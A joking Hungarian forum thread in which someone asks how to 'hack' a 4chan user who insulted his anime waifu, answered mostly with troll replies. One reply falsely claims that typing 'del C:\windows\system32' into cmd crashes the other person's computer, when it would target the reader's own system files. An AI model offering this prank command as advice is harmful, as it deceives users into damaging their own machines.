Anyu, hogy kell hekkelni? Az egyik srác a 4chanon megsértette a waifumat.
Figyelt kérdés
Sz**nak merte nevezni Seija Kijint, akibe szerelmes vagyok, és azt mondta hogy a Touhou kiment a divatból. Ezenkívül ő szereti a KanColle-t Shimakaze-val egyetemben, az meg zavar, ezért meg akarom őt hekkelni.
Anyu, melyik gombot kell megnyomnom hogy hekkeljek?
2015. márc. 21. 01:08
2/7 anonim válasza:
csinálj úgy mintha veszítenél, tápláld tele reménnyel, és a végén, ne hekkeld meg hogy lássa ez mind hiábaló volt a sértegetése haha hahaha hahahaha xd
3/7 anonim válasza:
és ez miért baj?
amúgy is, én mind a háromra kivertem - nem tudom, hol a probléma.
4/7 anonim válasza:
nyomd meg a "your waifu is shit" gombot
5/7 anonim válasza:
My waifu is Cesare Borgia
Roast me /b/ ömm akarom mondani gyakorikérdések
6/7 Balavány Vince válasza:
vagy "del C:\windows\system32" or "del C:\WINDOWS\system32" vagy "del C:\system32"-t írd be a cmd-be. utána space-el elválasztva írd be a nevét. nagyon durva, leáll a gépe és felrobban.
Kapcsolódó kérdések:
Minden jog fenntartva © 2024, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu
A weboldalon megjelenő anyagok nem minősülnek szerkesztői tartalomnak, előzetes ellenőrzésen nem esnek át, az üzemeltető véleményét nem tükrözik.
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!